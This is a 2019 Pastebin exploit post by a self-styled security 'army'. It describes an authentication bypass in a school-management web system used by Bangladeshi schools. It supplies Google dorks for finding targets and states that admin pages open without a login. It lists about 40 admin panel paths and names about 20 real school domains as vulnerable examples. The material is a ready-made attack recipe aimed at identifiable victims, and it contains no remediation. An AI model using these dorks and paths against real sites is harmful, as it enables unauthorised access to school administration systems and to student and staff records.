KingSkrupellos

StitBD Engr Rashedul Islam Improper Authentication

Mar 3rd, 2019
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.55 KB | None | 0 0
  1. ###########################################################################
  2.  
  3. # Exploit Title : Technical Support StitBD Engr Rashedul Islam Improper Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/03/2019
  7. # Vendor Homepages : stitbd.com ~ rashedul.info
  8. # Information about Software : stitbd.com/#work
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Exploit Risk : Medium
  12. # Google Dorks :
  13. intext:Develop By: Engr. Rashedul Islam Technical Support: STITBD site:edu.bd
  14. intext:Develop By: Engr. Rashedul Islam site:edu.bd
  15. intext:Technical Support: STITBD site:edu.bd
  16. # Vulnerability Type :
  17. CWE-287 [ Improper Authentication ]
  18. CWE-592 [ Authentication Bypass Issues ]
  19. CWE-305 [ Authentication Bypass by Primary Weakness ]
  20. CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
  21. CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
  22. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
  23. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  24. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  25. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  26.  
  27. ###########################################################################
  28.  
  29. # Information about Software and Owner :
  30. *************************************
  31. Dr. Md Rashedul Islam who is a web developer is a supervisor by Computer Vision &
  32.  
  33. Pattern Recognition Lab, University of Asia Pacific.
  34.  
  35. He is a researcher at School of Computer Science and Engineering, University of Aizu, Japan.
  36.  
  37. And the web developer is Associate Professor at Dept. of CSE,
  38.  
  39. University of Asia Pacific, Dhaka, Bangladesh and created and helped by StitBD Software
  40.  
  41. Company for Bangladeshi Education School Management Pro websites.
  42.  
  43. ###########################################################################
  44.  
  45. # Impact :
  46. **********
  47. * When an actor claims to have a given identity, the software does not prove or insufficiently
  48.  
  49. proves that the claim is correct.
  50.  
  51. * The authentication algorithm is sound, but the implemented mechanism can be bypassed
  52.  
  53. as the result of a separate weakness that is primary to the authentication error.
  54.  
  55. * This product requires authentication, but the product has an alternate path or
  56.  
  57. channel that does not require authentication.
  58.  
  59. * The authentication scheme or implementation uses key data elements that are assumed
  60.  
  61. to be immutable, but can be controlled or modified by the attacker.
  62.  
  63. ###########################################################################
  64.  
  65. # Authentication Bypass/Improper Authentication Exploit :
  66. *************************************************
  67.  
  68. Admin Panel Login Path :
  69. **********************
  70. /login.php
  71. /SMS/index.php
  72. VULNERABLESITE:2096
  73.  
  74. Note : No need to know admin username and admin password
  75.  
  76. Just add this file names after admin/
  77.  
  78. You are in the Admin Panel - Congratulations :)
  79.  
  80. # Useable Admin Control Panel Links :
  81. **********************************
  82.  
  83. /admin/admin.zip
  84. /admin/baner.php
  85. /admin/class_routine.php
  86. /admin/egeneral_notice.php
  87. /admin/employees_attendance.php
  88. /admin/exam_routine.php
  89. /admin/executive_council.php
  90. /admin/executive_councile.php
  91. /admin/general_notice.php
  92. /admin/headmaster_message.php
  93. /admin/history.php
  94. /admin/hsc_result.php
  95. /admin/jsc_result.php
  96. /admin/lecture_plan.php
  97. /admin/lesson_plan.php
  98. /admin/library.php
  99. /admin/office_order.php
  100. /admin/photo.php
  101. /admin/photo1.php
  102. /admin/photo1e.php
  103. /admin/photoe.php
  104. /admin/president_message.php
  105. /admin/result.php
  106. /admin/resulte.php
  107. /admin/school_name.php
  108. /admin/scout_list.php
  109. /admin/scout_liste.php
  110. /admin/ssc_result.php
  111. /admin/stu_attendance.php
  112. /admin/stu_info.php
  113. /admin/stu_infoe.php
  114. /admin/student.php
  115. /admin/studente.php
  116. /admin/t_attendance.php
  117. /admin/teacher.php
  118. /admin/teacher_image.php
  119. /admin/teachere.php
  120. /admin/user.php
  121. /admin/usere.php
  122.  
  123. ###########################################################################
  124.  
  125. # Example Vulnerable Sites :
  126. *************************
  127. [+] kphs1972.edu.bd/admin/president_message.php
  128.  
  129. [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
  130.  
  131. [+] paishahs.edu.bd/admin/president_message.php
  132.  
  133. [+] harinathpuramhighschool.edu.bd/admin/president_message.php
  134.  
  135. [+] alampurnmhighschool.edu.bd/admin/president_message.php
  136.  
  137. [+] harinathpuramhighschool.edu.bd/admin/president_message.php
  138.  
  139. [+] tarakandihighschoolsrj.edu.bd/admin/president_message.php
  140.  
  141. [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
  142.  
  143. [+] gandhailgirlshighschool.edu.bd/admin/president_message.php
  144.  
  145. [+] purbokhukshiahighschool.edu.bd/admin/president_message.php
  146.  
  147. [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
  148.  
  149. [+] goalbathanhighschool.edu.bd/admin/president_message.php
  150.  
  151. [+] meghaimmbpdakhilmadrasha.edu.bd/admin/president_message.php
  152.  
  153. [+] sajanpurihs113503.edu.bd/admin/president_message.php
  154.  
  155. [+] mahdm2002.edu.bd/admin/president_message.php
  156.  
  157. [+] abdulabadbhohumukhihighschool.edu.bd/admin/president_message.php
  158.  
  159. [+] rrhs.edu.bd/admin/president_message.php
  160.  
  161. [+] bhakhs.edu.bd/admin/president_message.php
  162.  
  163. [+] srnhs.edu.bd/admin/president_message.php
  164.  
  165. [+] bjkhs1883.edu.bd/admin/president_message.php
  166.  
  167. [+] gareyafazilmadrasha.edu.bd/admin/president_message.php
  168.  
  169. [+] haldiahs.edu.bd/admin/president_message.php
  170.  
  171. [+] sirjcboseic.edu.bd/admin/president_message.php
  172.  
  173. ###########################################################################
  174.  
  175. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  176.  
  177. ###########################################################################
Add Comment
Please, Sign In to add comment